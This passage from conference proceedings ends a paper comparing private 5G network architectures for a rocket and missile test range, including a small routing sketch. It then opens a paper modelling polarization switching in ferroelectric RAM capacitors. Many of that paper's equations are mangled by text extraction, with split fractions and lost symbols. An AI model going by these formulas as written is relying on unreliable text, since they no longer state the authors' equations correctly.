2. An isolated local 5G network built for the PMC, created by a mobile operator (licensed frequency, completely private, non-shared).
3. Sharing of the RAN between the private network for PMC maintenance and the public network.
4. RAN and Control Plane Sharing between private and public networks.
5. RAN and Core Sharing (End-to-End Network Slicing) between private and public networks.
6. N3 LBO (Local Breakout).
7. F1 LBO (Local Breakout).
1. Isolated local 5G network built for PMC (5G local frequency, completely closed, non-shared) (Fig. 5).
Fig. 5. Isolated local 5G network
The company servicing the PMC deploys a complete set of 5G network elements (gNB, UPF, 5GC-CP) in a dedicated room (hangar/building). Enterprise 5G here uses a local (unlicensed) 5G frequency, not the licensed frequencies of mobile operators. This version of the 5G architecture is used in a number of countries where the state allocates such frequency ranges for private networks (at present, developed countries such as Japan, Germany and the United States). Who builds the network: in this case, the company that performs the maintenance of the PMC builds its own private 5G network, but depending on each government's policy, both integrators and mobile operators can build a private 5G network for a test polygon. A company servicing the PMC can build its own local 5G network using an unlicensed 5G frequency (this issue had not been resolved in Ukraine as of 2021), which frees it from traditional wired LANs and from the inconveniences associated with wireless LANs (cable wiring, short distances, issues with the security and stability of a wireless network). In addition, the ultra-low latency and ultra-high capacity of 5G make it possible to expand the network or optimize the existing one.

Pros (in the case of a fully deployed 5G infrastructure):

1. Confidentiality and security: a private network is physically separated from public networks, providing complete data security (the data traffic generated by private network devices, the subscription information and the information about the operation of private network devices are all stored and managed only within the enterprise; data is transmitted internally and cannot be leaked).
2. Ultra-low latency: as the network delay between a device and an application server is several milliseconds, URLLC application services can be implemented.
3. Complete independence from the mobile operator's network: even if the mobile operator's 5G network or equipment fails, the private 5G network will keep working.

Cons: the company will need engineers of appropriate competence, with skills in the construction and operation of 5G networks. It is difficult to buy and deploy a complete 5G network at one's own expense.

2. Isolated local 5G network for the PMC created by a mobile operator (licensed frequency, completely private, non-shared) (Fig. 6).
Fig. 6. Isolated 5G LAN for PMCs created by a mobile operator
The architecture of the 5G private network is the same as in option 1. The only difference is that mobile operators create and operate the local 5G network for the PMC using their own licensed 5G frequencies.

3. RAN sharing between a private network for PMC maintenance and the public network (Fig. 7).

The UPF, 5GC-CP and MEC are deployed at the PMC and physically separated from public networks. Only the 5G base stations (gNBs) located within the PMC are shared by the private and public networks (RAN sharing). Data traffic (black lines) of devices belonging to the private slice (private network) is delivered to the private UPF on the territory of the PMC; data traffic (blue lines) of devices belonging to the public slice (public network) is delivered to the mobile operator's UPF. In other words, private network traffic (for example, device control data, internal video, etc.) remains only within the perimeter of the PMC, while public network traffic (voice and Internet) is transmitted to the network of the mobile operator. Although the base stations are separated logically rather than physically, it is practically difficult to intercept private network data at the RAN level alone, so private network data transmission for the PMC is relatively secure. The private, dedicated 5GC-CP is located on the territory of the PMC, so subscription information and information on the operation of private network devices at the facility are stored and managed inside the polygon and do not leave the facility.
Fig. 7. RAN sharing between private and public networks
4. RAN and Control Plane Sharing between private and public networks (Fig. 8).

A private UPF and MEC are installed on the territory of the PMC. The 5G base stations (gNB) installed on the territory of the PMC and the 5GC-CP installed in the cloud of the mobile operator are shared by the private and public networks (RAN and Control Plane Sharing). The gNB and 5GC-CP are logically separated between the private network and the public network, while the UPF and MEC are physically separate and used only by the PMC. Data traffic (black lines) of devices belonging to the private slice (private network) is delivered to the private UPF on the territory of the PMC; data traffic (blue lines) of devices belonging to the public slice (public network) is delivered to the mobile operator's UPF. In other words, private network traffic (internal device control data, internal video data, etc.) remains only within the perimeter of the PMC, and public network traffic (voice and Internet) is transmitted to the network of the mobile operator. As in option 3 (RAN sharing), the security of data traffic within the facility is evident. Control-plane functions (authentication, mobility, etc.) for private and public network devices are performed in the 5GC-CP in the mobile operator's network, meaning that the private network devices, gNB and UPF located on the territory of the PMC interact with the mobile operator's network and are controlled by it (via the N2 and N4 interfaces). The disadvantage of this option is that the subscription data of private network devices is stored on the server of the mobile operator rather than within the perimeter of the PMC, and that control is carried out by the cellular operator.
Fig. 8. RAN and Control Plane Sharing between private and public networks
Because the UPF and MEC are located on the territory of the PMC, ultra-low-latency communication between the gNB and the UPF is provided, which is suitable for servicing optoelectronic stations performing trajectory measurements in real time.

5. RAN and Core Sharing (End-to-End Network Slicing) between private and public networks (Fig. 9).

This is the case when only gNBs are deployed inside the PMC, and the UPF and MEC exist only at the mobile operator. The private network and the public network share the 5G RAN and core (MEC, UPF, 5GC-CP) (End-to-End Network Slicing). Unlike options 3 and 4, where the UPF and MEC are located on the territory of the PMC, in this case there is only a gNB inside the PMC. Therefore, there is no local junction for private traffic between 5G devices and PMC network devices, such as optoelectronic stations for trajectory measurement, so traffic has to go to the mobile operator's UPF and then return to the PMC devices via a dedicated communication channel. In addition, the MEC, which provides 5G application services for 5G devices within the PMC, is located at the mobile operator, far from the OESs that broadcast the video stream. In this architecture, the round-trip time (RTT) can become a serious problem if the distance between the PMC (the video-broadcasting OESs) and the operator's equipment (UPF, MEC) is large enough.
Fig. 9. RAN and Core Sharing (End-to-End Network Slicing) between private and public networks
Because traffic from private network devices is transmitted from the PMC to the mobile operator's network, there is a data traffic security problem. While the mobile operator allocates resources in the UPF and MEC to separate private network traffic from public and other private network traffic, PMC managers will be concerned that, for example, trajectory measurement data is transmitted outside the PMC. As in option 4, a disadvantage of this option is that the subscription data of private network devices is stored on the server of the mobile operator rather than within the perimeter of the PMC, and that control is carried out by the cellular operator. This architecture is the most cost-effective way for mobile operators to create a private 5G network compared to options 2, 3 and 4, which require the deployment of a UPF and/or 5GC-CP within the facility. However, the PMC has security issues (the data traffic generated by private network terminals, the subscription information and the operational information of private network devices leave the PMC perimeter). There is also a problem of network latency between private 5G devices and MEC application servers, as well as between private 5G devices and intranet/LAN devices.

6. N3 LBO (Local Breakout): based on a solution of the SK Telecom operator in South Korea (Fig. 10).
Fig. 10. N3 LBO (Local Breakout)
In panel (a), the gNB is deployed on the territory of the PMC, as in option 5. A GTP tunnel on the N3 interface is created between the gNB and the UPF when a device (a CCTV camera or an OES) connects; both devices here are public network devices. In panel (b), the MEC Data Plane (equipment that does not support 3GPP; ETSI MEC) and MEC applications are installed on the territory of the PMC. The Mobile Edge Platform (MEP) and the mobile operator's orchestrator control the flow of traffic in the MEC DP. If an IP address belongs to the local PMC network, then private 5G devices, local wired network devices and local MEC application servers exchange traffic through a local breakout.
The MEC DP inspects the IP addresses of the packets belonging to all GTP tunnels coming from the gNB and, if a packet is local traffic, forwards the user's IP packet to the internal private network after decapsulating it from the GTP protocol. Although this method is not standardized by 3GPP, it makes it possible to separate private network traffic from public traffic. Unlike in option 5, private network traffic is not transmitted to the mobile operator's network, so the security of private network data traffic is the same as in options 3 and 4. In addition, since the MEC is also deployed at the PMC and processes the traffic that passes through the MEC DP, it can connect devices to applications with very little delay. However, since the MEC DP is not a 3GPP UPF device, it cannot perform mobility management and charging functions for private network devices; operators can try to create proprietary solutions to implement these capabilities. As in options 4 and 5, the disadvantages of this option are that the subscription data of private network devices is stored on the server of the mobile operator rather than within the perimeter of the PMC, and that control is carried out by the mobile operator.
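Schematically, the local-breakout decision can be pictured as follows; this is a hedged sketch under our own assumptions (the subnet, packet layout and names are invented), not SK Telecom's implementation:

```python
import ipaddress

LOCAL_NET = ipaddress.ip_network("10.20.0.0/16")   # hypothetical PMC subnet

def steer(gtp_packet):
    """Keep local traffic on site; tunnel everything else to the UPF."""
    inner_ip = ipaddress.ip_address(gtp_packet["inner_dst_ip"])
    if inner_ip in LOCAL_NET:
        # Decapsulate from GTP and break out to the PMC LAN.
        return ("local_lan", gtp_packet["payload"])
    # Otherwise forward the tunnelled packet towards the operator's UPF (N3).
    return ("operator_upf", gtp_packet)

print(steer({"inner_dst_ip": "10.20.1.7", "payload": b"video"})[0])  # local_lan
```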
7. F1 LBO (Local Breakout): an example from the KT operator in South Korea (Fig. 11).
Fig. 11. F1 LBO (Local Breakout), where:
– CU (Centralized Unit);
– RU (Radio Unit);
– DU (Distributed Unit).

This option is almost the same as option 6; however, only the RU/DU are deployed on the territory of the PMC, the CU is located in the operator's network, and private network traffic is locally broken out from the F1 interface rather than from the N3 interface. The split architecture (between centralized and distributed units) allows performance functions, load management and real-time performance optimization to be coordinated, and provides adaptation to different applications and QoS requirements, which must be supported when broadcasting video streams from multiple OESs. Flexible hardware and software implementations allow for scalable and cost-effective network deployment, but only if the hardware and software components are compatible and, in case they come from different vendors, are interchangeable and coherent.
4 Comparing 4G/5G Networks by Downloading Video

An experiment was performed to predict the real performance of 5G and Gigabit LTE-enabled devices running on a standalone-architecture (SA) network [12]. The 5G NR SA macro network segment model included 20 5G NR base stations located on the same sites as existing LTE cells. The 5G NR network model operated in a 100 MHz band of the 3.5 GHz range, and the Gigabit LTE TDD core network operated in three LTE spectrum bands (3 × 20 MHz). The propagation between base stations and devices was modeled taking into account possible signal propagation losses, shading, diffraction, losses when passing through buildings, interference, etc. In addition, the simulation involved various radio technologies, including Massive MIMO for 5G NR with 256 antenna elements and 4 × 4 MIMO for LTE TDD networks. The experiments [12] showed an increase in network bandwidth for downstream data of approximately 5 times when switching from LTE TDD with a mixture of LTE devices of different categories to 5G NR using 5G NR and Gigabit LTE multimode devices. Another significant advantage was that the average spectral efficiency increased 3 times. Measurements were performed when downloading a high-quality video (3 GB) from cloud storage, as well as when streaming 360-degree video (8K format, 120 frames per second, adaptive bitrate). The maximum download speed reached 357 Mbps, which allowed lossless transmission and playback of video in 8K resolution at 120 fps.
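A quick back-of-the-envelope check of these figures (an idealised estimate assuming the peak rate is sustained and ignoring protocol overhead):

```python
size_bits = 3 * 8e9           # 3 GB video, decimal gigabytes
rate_bps = 357e6              # 357 Mbps peak download speed
print(size_bits / rate_bps)   # ~67 s to pull the file at the peak rate
```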
5 Conclusions As for performing the function of video streaming, both technologies successfully cope with the task. With a large number of OESs on the polygon, it is not necessary to broadcast from all cameras at the same time. The video stream is transmitted only from the OES, which currently follows the target. At the same time, we have a significant bandwidth reserve if we use 5G technology. In case of using 5G, the average spectral efficiency increases 3 times. Additionally, 5G provides the best network security. 5G technology provides a more flexible network structure compared to 4G. The 5G private network architecture options described above have their advantages and disadvantages, and there is no architecture which is optimal for all situations. During the construction of a PMC, it will be necessary to choose the best option based on the safety requirements, the allocated budget for implementation and operation and the terms of commissioning. Taking into account the peculiarities of a PMC, the second and third options of the 5G network architecture are the most acceptable.
References 1. Chmaytelli, M.: 5G private networks for logistics and warehousing (2021). https://www.mfatech.org/wp-content/uploads/5G-Private-Networks-for-Logistics-and-Warehousing_FINAL. pdf
748
I. Shostko and Y. Kulia
2. Duke-Woolley, R., Kokkos, A.: Uni5G Private Networks: A Simplified Path to Deployment Webinar. Beecham Research, pp. 1–22 (2021). https://www.mfa-tech.org/wp-content/ uploads/MFA_Uni5GWebinar_FINAL.pdf 3. Shahnovich, I.: Sistemi besprovodnoi svyazi 5G telekommunikacionnaya paradigma kotoraya izmenit mir. Elektronika NTB 7, 48–55 (2015) 4. Deyak, T.: Standarti mobilnogo zv’yazku 4g-5g-6g – podibnist vidminnosti perspektivi (2021). https://www.itbox.ua/ua/blog/Standarti-mobilnogo-zvyazku-4G5G6G--podibn ist-vidminnosti-perspektivi/ 5. Gladka, O.: Pobudova sistemi dlya internetu rechei. Regionalnii seminar MSE. In: Tendencii Razvitiya Konvergentnih Setei Resheniya Post ngn 4g i 5g. Kiev, Ukraine, pp. 27–29 (2016) 6. Shostko, I., Tevyashev, A., Neofitnyi, M., et al.: Information and measurement system based on wireless sensory infocommunication network for polygon testing of guided and unguided rockets and missiles. In: International Scientific-Practical Conference Problems of Infocommunications Science and Technology. 9–12 October, Kharkiv, Ukraine, pp. 705–710 (2018) 7. MulteFire Alliance: MFA TS 36.211 Physical Channels and Modulation, p. 14 (2017). https:// www.multefire.org/specification/ 8. Bubley, D.: Private LTE Networks & CBRS, pp. 1–20 (2021). https://www.ibwave.com/Mar keting/Download/ebook-private-LTE-CBRS.pdf 9. Virag, B., McDevitt, S., et al.: Private Campus Networks, pp. 1–4 (2019). https://www.adl ittle.com/sites/default/files/viewpoints/adl_private_campus_networks-min_0.pdf 10. Brown, G., Analyst, P.: Private LTE Networks, pp. 1–11 (2017). https://www.qualcomm.com/ media/documents/files/private-lte-networks.pdf 11. Harrison, J.S.: 7 Deployment Scenarios of Private 5G Networks (2019). https://www.netman ias.com/en/post/blog/14500/5g-edge-kt-sk-telecom/7-deployment-scenarios-of-private-5gnetworks 12. Polzovatelskii opit v setyah 5G NR ojidaemii v realnih usloviyah, Qualcomm (2018). https:// habr.com/ru/company/qualcomm_russia/blog/433154/
Mathematical Model of Electric Polarization Switching in a Ferroelectric Capacitor for Ferroelectric RAM Inna Baraban1 , Andriy Semenov1(B) , Serhii Baraban2 , Olena Semenova1 Mariia Baraban3 , and Andrii Rudyk4
,
1 Faculty for Infocommunications, Radioelectronics and Nanosystems, Vinnytsia National
Technical University, 95 Khmelnytske Shose Street, Vinnytsia 21021, Ukraine [email protected] 2 Faculty of Information Technologies and Computer Engineering, Vinnytsia National Technical University, 95 Khmelnytske Shose Street, Vinnytsia 21021, Ukraine [email protected] 3 Faculty for Computer Systems and Automation, Vinnytsia National Technical University, 95 Khmelnytske Shose Street, Vinnytsia 21021, Ukraine 4 Department of Automation, Electrical Engineering and Computer-Integrated Technologies, National University of Water and Environmental Engineering, 11 Soborna Street, Rivne 33028, Ukraine [email protected]
Abstract. In this paper a mathematical model of polarization switching in a ferroelectric capacitor has been developed. This model reflects adequately processes of writing and reading in elements of the FRAM-memory and may be utilized in an automated design of ferroelectric storage elements and devices. The object of research is processes of polarization switching in ferroelectric films of nanosized storage elements. The purpose of the study is to develop a mathematical model of electrical polarization switching for thin-film ferrocapacitors. A research method is applied theoretical analysis and mathematical modeling. Keywords: FRAM · polarization switching · ferroelectric capacitor · repolarization · polarizing field
1 Introduction The history of ferroelectric research began in the 1920s after Nicholson discovered anomalous dielectric properties in the ferrite salt, which were described in detail by Valashek in the same years. However, the unique properties of the ferrous salt and later discovered ferroelectrics of the potassium dihydrogen phosphate group were considered exotic exceptions and did not attract serious attention of scientists. Only after the discovery in 1944 by scientists B.M. Vul and I.M. Goldman ferroelectric properties of barium titanate the scientific community’s attention to ferroelectrics is constantly growing.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 749–770, 2023. https://doi.org/10.1007/978-3-031-35467-0_44
750
I. Baraban et al.
The growing interest in ferroelectric materials is due not only to its unique physical properties, but also the possibility of wide application in engineering. One of the promising industries for the use of ferroelectrics since its invention has always been computer technology, in which ferroelectric materials were associated with the functions of memorization and storage of information [1]. However, for a long time, until (80–90) of the last century, the implementation of these functions was constrained by the imperfection of the technology of ferroelectrics, especially in the thin-film version, which made ferroelectric memory uncompetitive with other types of memory. Advances in the technology of manufacturing ferroelectric films (chemical deposition from solution and gas phase, molecular beam epitaxy, pulsed laser deposition, etc.) [2], which date back to about the 90s of the last century, contributed to a significant improvement in film quality. The first report on the development of a practical ferroelectric storage device came from Ramtron in 1988, which manufactured a 256-bit random access memory (RAM) based on ferroelectric capacitors [3]. The new non-volatile ferroelectric storage device is called FRAM (Ferroelectric Random Access Memory), and the world-famous companies Toshiba, Samsung, Fujitsu, Hynix and others have joined the race to improve FRAM memory. Memory capacity of ferroelectric RAM up to hundreds of Mbit with a sampling time of ten nanoseconds [4]. Genie was released from the bottle and FRAM memory began to expand rapidly. The latter raised the issue of theoretical substantiation of physical processes in the elements of FRAM-memory and mathematical and computer modeling of information recording and reading processes. The first studies in this direction date back to the middle of the last century, and its results are reflected in the classic works of F. Ion, D. Sheeran “Ferroelectric crystals”, 1965; M. Lines, A. Glass, “Ferroelectrics and Related Materials,” 1981; J. Barfoot, J. Taylor, “Polar Dielectrics and Its Applications,” 1981; V.M. Rudyak “Processes of repolarization in nonlinear crystals”, 1986 and many other publications and journal articles. Since the cornerstone of FRAM memory is two metastable states, which can be changed by switching spontaneous polarization by an electric field, in theoretical terms, it is the processes of switching (repolarization) are the main issues in the development of reliable ferroelectric RAM. The repolarization of ferroelectrics has been given close attention since the first years of its research, because repolarization distinguishes ferroelectrics in a special class of active substances. But even today, the problems associated with repolarization are far from the final solution and it is suggested that a general theory of repolarization, which would cover all classes of ferroelectrics is impossible [5]. A new direction in the study of ferroelectrics, known as “research on the first principles”, has not yet yielded significant results on repolarization processes, and we quote “calculations on the first principles are suitable for studying a limited range of basic nanoelectronic devices of small complexity consisting of a large number of nanoscale elements” [6]. 
These circumstances have created the preconditions for FRAM memory developers to try to solve the problem of repolarization modeling by creating so-called “behavioral” models that simulate experimental results obtained for elements made according to certain technological standards [7].
Mathematical Model of Electric Polarization Switching
751
Since there are no results of experimental studies of repolarization, which would form the basis for the development of targeted behavioral model, at this stage, mathematical models of repolarization are developed based on classical results of experimental research.
2 Physical Models of Polarization Switching Physical models of polarization switching are based on real physical processes that occur in ferroelectrics during polarization reorientation. Since such processes in different ferroelectric materials differ significantly and the laws by which they obey are not definitively clarified, it is necessary to postulate a certain dependence of polarization or the rate of its change on the parameters of the ferroelectric and external action. First-Order Physical Model The first-order model assumes that the rate of change of polarization over time is proportional to the multiplication of the non-polarized part of a unit volume and the rate of its expansion. One of the first such models is the model [8]: dP = υ(PS − P)e−α / E(t) , dt
(1)
where P is the polarization, PS is the spontaneous polarization, E(t) is the electric field intensity, α (activation field) and υ (the value is inverse to the specific dielectric viscosity) are the parameters of ferromaterial. If the initial value of polarization P0 (−PS < P0 < 0), then the solution of Eq. (1) is given by the expression ⎞ ⎛ t P = PS − (PS − P0 ) exp⎝−υ e−α / E(t) dt ⎠, (2) 0
from which it follows that when t = 0, P = P0 , but when t → ∞ polarization becomes saturated P = PS only under the condition that the integral in (2) also acquires infinite values, which does not occur at any field intensity E(t). Therefore, expression (2) is analyzed for some intensities E(t) and the conditions necessary for the reorientation of the polarization are clarified. Step-by-Step Increase Field Intensity For step intensity E(t) = E1(t), where E = const, and 1(t) is the unit step function, relation (2) takes the form (3) P = PS − (PS − P0 ) exp −υte−α / E , or, under the initial condition P0 = -PS , P=
P = 1 − 2 exp −υte−α / E , PS
(4)
752
I. Baraban et al.
Fig. 1. Normalized characteristics at step intensity according to the physical model of the 1st order: a) - switching, b) – polarizing.
where P is the normalized polarization. In Fig. 1 a family of normalized switched (Fig. 1a) and polarization (Fig. 1b) characteristics are shown, built on the expression (4), on which t = υt, E = / α, P = S is the normalized values. Switching characteristics of Fig. 1a corresponds to the maximum value of the polarization current density δ(t) = dP dt at the initial moment t = 0. This phenomenon occurs in ferroelectrics, in which the process of polarization reorientation is dominated by the time required for the formation of domains and its direct growth along the field [9]. An example of such a ferroelectric can be vanadium-aluminum sulfate hexahydrate (VASH). If the lateral domain growth dominates in the process of polarization reorientation, then the initial value of the polarization current density is zero, and its maximum is observed later. An example of such a ferroelectric is barium titanate. However, the delay of the maximum current density in time may also be due to the slow increase in field intensity. On the polarization characteristics of Fig. 1b parameter is the normalized duration of polarization pulses t K = υtK , where tK is the pulse duration. The general appearance of the polarization characteristics corresponds to those observed in most ferroelectrics. Note that with a limited duration of polarization pulses, the polarization may not reach a saturated value. Important parameters of the polarization switching process are the field strength required for switching and its duration, the maximum current density and the time in which it is observed. The time required to switch the polarization from P0 to PK is by expression (3) 1 α / E 1 − P0 PS , tK = e ln (5) υ 1 − PK PS
Mathematical Model of Electric Polarization Switching
753
Having accepted P0 = −PS , PK = 0, 9PS , E = α, and υ = (0, 8 − 4, 6) · 107 s−1 (for the material BaTiO3 [6]), we will receive tK = tS = (1, 8 − 10) · 10−7 s (tS is the polarization switching time). If the switching of polarization is carried out by rectangular pulses of intensity ES and duration tK , then the field intensity required to change the polarization from P0 to PK will be determined by the expression ES =
α ,
1−P0 / PS ln υtK ln 1−P K / PS
(6)
Since ES > 0, the pulse duration must satisfy the condition 1 − P0 PS 1 , tK > ln υ 1 − PK PS from which, for the same material, we obtain tK > (0, 65 − 3, 7) · 10−7 s. For the material BaTiO3 activation field α = 104 B/ CM and for pulse duration tK = 10−6 s from expression (6) provided P0 = −PS , we find ES = (0, 37 − 1, 0) · 104 V/cm. The maximum polarization current density is observed at the initial moment (t = 0) and, by expression (3), we find
P0 −α / E dP
e δm = = υPS 1 − , (7) dt 0 PS For films BaTiO3 35 nm thick on a substrate of material SrTiO3 , PS = 35 μC/cm2 [3]. If, moreover, take υ = (0, 8 − 4, 6) · 107 s−1 , as for bulk material, and E = α, then from (7) we find the maximum current density δm ≈ (1 − 5, 9) · 102 1 − P0 PS A/cm2 , which in order coincides with the experimentally observed results. Exponential Increase Field Intensity As noted, at step field intensity, the maximum current density is observed at the initial moment (see Fig. 1a), which occurs only for individual ferromaterials. In practice, a gradual increase intensity is extremely difficult to achieve. Therefore, consider the law of increasing intensity E(t) = E 1 − e−γ t , (8) which only when γ → ∞ converted into step intensity, and at small γ and limited time, reflects the linear law of growth of intensity. Let’s find out what will be the density of the polarizing current at the initial moment (t = 0), if the change intensity is determined by the expression (8). To do this, we decompose the exponent in expression (8) into the McLaren series 1 1 E(t) = E γ t − γ 2 t 2 + γ 3 t 3 − ... . 2 6
754
I. Baraban et al.
At small t (t < < 1 γ ) E(t) ≈ γ Et, where γ E is the rate of linear increase of intensity at the initial stage of switching polarization. Limiting ourselves to the consideration of small t, we transform relation (2) into the form P P0 αυ ≈1− 1− exp − F(x) , (9) PS PS γE where x = α γ Et, function F(x) is defined by an expression F(x) =
1 −x e + Ei (−x), x
and ∞ Ei (−x) = −
1 −x e dx x
x
is the integral exponential function [10]. Relation (9) allows us to find the rate of change of polarization at the initial stage with a linear increase in intensity d P PS αυ P0 α 2 υ 2 . F exp − ≈− 1− F(x) (x) dt PS γ 2 E 2 t 2 x γE For the small t (t → 0) and large respectively (x → ∞) function E i (-x) can be presented by series [10] 1! 3! e−x 2! 1 − + 2 − 3 + ... . Ei (−x) ≈ −x x x x Restricted to the first two members of the last row, we obtain 1 1 1 −x 1 −x 1− = 2 e−x , F(x) ≈ e − e x x x x where do we find
d P PS αυ P0 exp − ≈ 1− − υtxF(x) , dt PS γ Et
and, finally d P PS α P0 exp − ≈ 1− dt PS γ Et Since the coefficient γ can be arbitrarily large, but not infinite, then t = 0 d P PS d P PS
lim =
=0
t→0 dt dt 0
Mathematical Model of Electric Polarization Switching
755
at any polarization P0 and at any (but not infinite) rate of increase in field intensity at the initial stage. Since the derivative of polarization determines the current density, the polarization current at the initial stage is also zero. In Fig. 2 a normalized family of switching (Fig. 2a) and polarization (Fig. 2b) characteristics, with increasing voltage according to the law (8) are shown, where t = υt, E = E / α, γ = γ υ.
Fig. 2. Normalized characteristics at exponential increase of intensity according to the model of the 1st order: a) switching; b) polarization.
We find, further, the maximum value of the current density δm and the time at which this maximum is observed. Rewriting expression (2) in the form ⎤ ⎡ t −γ t P = PS − (PS − P0 ) exp⎣−υ e−α E (1−e ) dt ⎦, 0
we find ⎤ ⎡ t dP α −γ t − υ e−α E (1−e ) dt ⎦. = υ(PS − P0 ) exp⎣− δ(t) = dt E 1 − e−γ t
(10)
0
Since the argument of the external exponent can only take negative values, the maximum current density will correspond to the minimum of its modulus. Differentiating the modulus of the argument over time and equating the derivative to zero, we obtain the condition of maximum current density e−γ t αγ −α E (1−e−γ t ) 2 = e υE 1 − e−γ t
(11)
756
I. Baraban et al.
Equation (11) can be solved with respect to the variable t only by numerical methods for certain values α, γ , υ and E. In normalized form, Eq. (11) is written x (1 − x)2
= e−1/ (1−x) ,
(12)
where taken E α = 1, γ υ = 1, and x = exp(−γ t). Since the value of x is positive and does not exceed 0 < x < 1, Eq. (12) has only one solution x m ≈ 0,1905, and the corresponding value of time at which the current density is maximum is determined tm ≈
1 1 ln ≈ 1, 658 υ. υ xm
For ferroelectric material BaTiO3 , which υ = (0, 8 − 4, 6) · 107 s−1 , we will receive tm ≈ (0, 36 − 2, 1) · 10−7 s. The maximum value of the current density is by expression (10), in which, for the selected ratio between the parameters E α = 1, γ υ = 1, need to take exp(−γ t) = x m ≈ 0,1905, and as the upper bound of the integral t = t m ≈ 1, 658 υ. Appropriate calculations give the result P0 2 , A/cm2 . δm ≈ (0, 63 − 3, 64) · 10 1 − (13) PS It should be noted that for the same material, the maximum current density at step voltage is greater than at exponential, but the latter is observed later. These differences are not due to processes in ferroelectrics, and the law of increasing voltage. The switching time of polarization at exponential intensity can be estimated only by numerical methods. However, it is hoped that this time will be of the same order as the switching time at step voltage. Second-Order Physical Model As noted, in the first-order physical model, the maximum current density at step voltage is observed at the initial stage, which occurs only in some ferroelectrics with specific polarization mechanisms. In most ferroelectrics with a perovskite structure, the maximum of the polarization current is delayed in time. This feature, to some extent, is realized by the physical model of the second order [6] dP P 2 −α / E(t) = υPS 1 − 2 e , (14) dt PS where the content of the values is the same as in the model (1). In the second-order model, the rate of change of polarization nonlinearly depends on the polarization. It is maximum when the modular polarization is minimal and vice versa. Therefore, the polarization at the beginning and end of the polarization process will change more slowly than in the model of the 1st order and faster in the middle.
Mathematical Model of Electric Polarization Switching
757
Solution of Eq. (14) under the initial condition P(0) = −P0 (−PS < P0 < 0), is given by the expression ⎡ ⎤ t 1 + P0 PS 1 P = PS th⎣ ln + υ e−α / E(t) dt ⎦, (15) 2 1 − P0 PS 0
which is more convenient to write in the form P =1− PS
2 1+
1+P0 / PS 1−P0 / PS
exp 2υ
t
.
(16)
e−α / E(t) dt
0
Relationships (15) or (16) determine a monotonically increasing function of time, which varies from P0 , at t = 0, to PS , at t → ∞. Thus, the theoretical polarization switching time is unlimited. The change in polarization is determined by the integral in (16), which only increases with time and, at large t, expression (16) acquires an approximate form ⎡ ⎤ t 1 − P0 PS P ≈1−2 exp⎣2υ e−α / E(t) dt ⎦, (17) PS 1 + P0 PS 0
From comparison (17) and (2) it follows that at large t the polarization in the model of the second order is closer to saturation than in the first. At rather small t, the exponent in (16) will be close to zero, the polarization will be close to the initial value, and then it will also slowly increase with zero initial velocity. If P0 = −PS , then repolarization does not occur at all, i.e. P(t) = −PS = const. However, in reality, the final polarization is never equal to the spontaneous one. Therefore in expressions (15) and (16) P0 > −PS . More specific estimates of the time dependence of the polarization in the secondorder model will be made for the step intensity E(t) = E1(t). Step-by-Step Increase Field Intensity For step intensity, expression (16) takes the form P =1− PS 1+
2
1+P0 / PS 1−P0 / PS
, exp 2υte−α / E
(18)
on which the normalized families of switching (Fig. 3a) and polarization (Fig. 3b) char acteristics are constructed, where t = υt, E = E / α, P = P PS , and P 0 PS = − 0,99. The time required to switch the polarization from the initial value P 0 = P0 PS < 0 to the value P K = PK PS > 0 is determined by the expression 1 − P0 1 + PK 1 α/ E e ln (19) tK = . 2υ 1 − PK 1 + P0
758
I. Baraban et al.
Fig. 3. Normalized characteristics at step intensity according to the model of the 2nd order: a) switching, b) polarization.
Having accepted P0 = −0,99PS , PK = 0,9PS , E = α, and υ = (0, 8 − 4, 6) · 107 by expression (1.19), we find tK = tS ≈ (2, 4 − 14) · 10−7 s, that, about one and a half times more than in the 1st order model. If the switching of polarization is carried out by rectangular pulses of intensity E and duration tK , then the field intensity required to change the polarization from P0 < 0 (P0 > - PS ) to PK > 0, will be determined
s−1 ,
E=
α
. 1+P K 1−P0 −1 ln 2υtK · ln 1−P 1+P K
(20)
0
Since E > 0, the pulse duration must satisfy the requirement 1 − P0 1 + PK 1 ln , tK > 2υ 1 − PK 1 + P0
(21)
of which, provided that P 0 = -0,99, P K = 0,9, and υ = (0, 8 − 4, 6) · 107 s−1 , we find tK ≥ (0, 89 − 5, 1) · 10−7 s, which is also approximately 1.5 times larger than in the 1st order model. If the pulse duration is taking tK = 10−6 s, α = 104 V/cm, then it would be found by expression (20) E = ES ≈ (0, 41 − 1, 5) · 104 V/cm, which is also larger than in the 1st order model. By expression (18) it is easy to find that the time at which the rate of change of polarization is the maximum and the maximum current density coincides with the time of change of the sign of polarization 1 α / E 1 − P0 PS . e ln (22) t 0 = tm = 2υ 1 + P0 PS
Mathematical Model of Electric Polarization Switching
759
Taking P0 = -0,99PS , E = α, and υ = (0, 8 − 4, 6) · 107 s−1 , it would be received t0 = tm = (0, 2 − 1, 2) · 10−7 s. Thus, in the second-order model, the maximum current density, even with a step change in voltage, is delayed in time. The density of the polarization current in the second-order model is determined by the ratio δ(t) =
f (t) dP = 4PS υe−α / E 2 , dt 1 + f (t)
where f (t) =
(23)
1 + P0 PS exp 2υte−α / E . 1 − P0 PS
At t = tm function f (tm ) = 1 and the maximum value of the current density δm = υPS e−α / E ,
(24)
does not depend on the initial value of polarization and is twice less than in the 1st order model at the beginning of the repolarization process (see (7) at P0 = -PS ) and is for the same material δm ≈ (1 − 5, 9) · 102 A/cm2 . It should be expected that with an exponential increase intensity (see (8)), the estimates will not change significantly with a sufficiently steep increase intensity, i.e. when the value γ is large enough.
3 Crystallization Model of Polarization Switching The physical mechanisms of repolarization of ferroelectrics in its main features are similar to those observed in the crystallization of the melt during its cooling. In the works of Kolmogorov A.N. [11] and Avrami M. [12] developed geometric-probabilistic models of melt crystallization, which were transferred by Ishibashi Y. [13] to ferroelectric repolarization processes. The Main Mechanisms of Repolarization and Accepted Simplifications • Origin of inverse polarity domains (domains with spontaneous field-oriented polarization). • Rapid growth of the formed domains in the direction of the field through the entire thickness of the ferroelectric without a noticeable change in its transverse dimensions (formation of needle domains). • Lateral growth of needle domains in the directions of the transverse fields. • Overlapping domains in the process of its lateral growth. Repolarization can also begin with the growth of hidden and field-oriented embryos of domains that were in the ferroelectric before the application of the field, and continue in accordance with the described sequence. Significant influence on the process of emergence of embryos and its growth is created by the surface of the ferroelectric, taking into account which causes the greatest
760
I. Baraban et al.
